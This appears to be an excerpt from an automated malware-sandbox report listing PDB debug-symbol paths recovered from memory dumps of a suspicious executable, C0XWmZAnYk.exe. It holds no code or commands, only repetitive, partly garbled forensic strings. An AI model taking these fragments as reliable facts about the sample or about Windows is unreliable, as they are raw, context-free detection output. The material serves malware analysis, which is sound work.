        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133409023789902202.txt source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\+} source: C0XWmZAnYk.exe, 00000006.00000003.2393020951.0000000003183000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2380241089.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379563679.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570660623.000000000318E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569168880.000000000318C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601657685.000000000318C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357270354.000000000318D000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2381176027.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2379729542.0000000003187000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2383467779.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357107543.0000000003178000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515307388.0000000003187000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2357189135.000000000317E000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2382327079.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2665007852.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigdd source: C0XWmZAnYk.exe, 00000006.00000003.2569586758.00000000033AD000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2588948380.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590807441.00000000033AD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2591021767.00000000030F4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2591557050.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: C0XWmZAnYk.exe, 00000006.00000003.2669190451.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.rigd source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\\' source: C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\* source: C0XWmZAnYk.exe, 00000006.00000003.2651413320.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2652949602.0000000003601000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\id-ID\od.pdb\e\&~ source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2570696868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590747868.00000000030F0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a\ source: C0XWmZAnYk.exe, 00000006.00000003.2674038254.0000000003681000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2669410253.000000000343F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.rigd*e source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\4\* source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\y\ source: C0XWmZAnYk.exe, 00000006.00000003.2590007588.0000000003160000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570214748.000000000315A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: C0XWmZAnYk.exe, 00000006.00000003.2642488194.0000000003379000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641342827.000000000335C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650104372.0000000003370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ef\ source: C0XWmZAnYk.exe, 00000006.00000003.2654737179.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654288784.00000000036F2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.00000000036F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\ source: C0XWmZAnYk.exe, 00000006.00000003.2642157736.0000000003313000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641465788.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622184907.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\fup.pdb source: C0XWmZAnYk.exe
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errortory\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\AppCache133409024501033688.txt source: C0XWmZAnYk.exe, 00000006.00000003.2516389962.0000000003344000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.0000000003331000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2641915161.000000000348F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622771619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642892348.0000000003498000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: C0XWmZAnYk.exe, 00000006.00000003.2591290732.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.00000000032B4000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600081582.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590477631.00000000032C3000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569323863.00000000032B4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*) source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\*\8 source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393316611.000000000314B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393292141.000000000313D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: C0XWmZAnYk.exe, 00000006.00000003.2642488194.0000000003379000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2641342827.000000000335C000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650104372.0000000003370000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\o source: C0XWmZAnYk.exe, 00000006.00000003.2660383574.0000000003749000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664709026.0000000003756000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2665419996.0000000003775000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\40\ source: C0XWmZAnYk.exe, 00000006.00000003.2381239465.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: C0XWmZAnYk.exe, 00000006.00000003.2651413320.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2652949602.0000000003601000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LbL2 source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2392919853.0000000003336000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393128569.0000000003352000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\" source: C0XWmZAnYk.exe, 00000006.00000003.2672094700.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: +C:\fup.pdb source: C0XWmZAnYk.exe
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: C0XWmZAnYk.exe, 00000006.00000003.2652474368.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655232224.0000000003368000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2658887283.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659946840.0000000003364000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660707268.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\be\ source: C0XWmZAnYk.exe, 00000006.00000003.2516054824.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569291711.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2569964189.0000000003109000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570520442.000000000310A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\r source: C0XWmZAnYk.exe, 00000006.00000003.2652474368.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655232224.0000000003368000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2658887283.0000000003351000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659946840.0000000003364000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660707268.0000000003367000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.erroroo source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ci4 source: C0XWmZAnYk.exe, 00000006.00000003.2622986302.000000000317B000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601840070.00000000031A2000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2622682972.0000000003132000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2600734428.0000000003194000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\*<a,.sK source: C0XWmZAnYk.exe, 00000006.00000003.2379525702.0000000003199000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: C0XWmZAnYk.exe, 00000006.00000002.2685366936.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674721242.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2679546118.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2674869784.00000000036F8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664952118.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2680639828.00000000036F8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: C0XWmZAnYk.exe, 00000006.00000003.2600081582.0000000003303000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2601014852.0000000003303000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\0<Y@F source: C0XWmZAnYk.exe, 00000006.00000003.2601338571.0000000003609000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\C source: C0XWmZAnYk.exe, 00000006.00000003.2669190451.0000000003755000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.rigd\ source: C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\*. source: C0XWmZAnYk.exe, 00000006.00000003.2381239465.00000000030FB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\es\ source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2653815384.0000000003651000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2650356078.0000000003639000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2654119617.0000000003681000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2655075144.0000000003699000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\; source: C0XWmZAnYk.exe, 00000006.00000003.2659154653.0000000003670000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2660593047.00000000036C0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659606445.00000000036B9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: C0XWmZAnYk.exe, 00000006.00000003.2570839997.0000000003162000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2568971999.0000000003472000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590596113.0000000003464000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2590095001.0000000003463000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570214748.000000000315A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\on Data source: C0XWmZAnYk.exe, 00000006.00000003.2643541510.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2642845526.00000000035E9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\ source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C\ source: C0XWmZAnYk.exe, 00000006.00000003.2643623610.000000000341E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error.rigd\}m source: C0XWmZAnYk.exe, 00000006.00000003.2517746239.00000000030FE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*> source: C0XWmZAnYk.exe, 00000006.00000003.2517312933.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393360628.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2515342248.00000000032BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .DATcontainentkrnlmp.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2515987538.0000000003117000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516084073.000000000311B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\P source: C0XWmZAnYk.exe, 00000006.00000003.2622120522.0000000003621000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\C source: C0XWmZAnYk.exe, 00000006.00000003.2660383574.0000000003749000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2664709026.0000000003756000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2659028541.00000000036E9000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2665419996.0000000003775000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbZ0[ source: C0XWmZAnYk.exe, 00000006.00000003.2517804596.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: C0XWmZAnYk.exe, 00000006.00000003.2515902450.000000000315C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: C0XWmZAnYk.exe, 00000006.00000003.2570371701.0000000003383000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2516298288.0000000003355000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2392919853.0000000003336000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2393128569.0000000003352000.00000004.00000020.00020000.00000000.sdmp, C0XWmZAnYk.exe, 00000006.00000003.2570272022.000000000335A000.00000004.00000020.00020000.00000000.sdmp
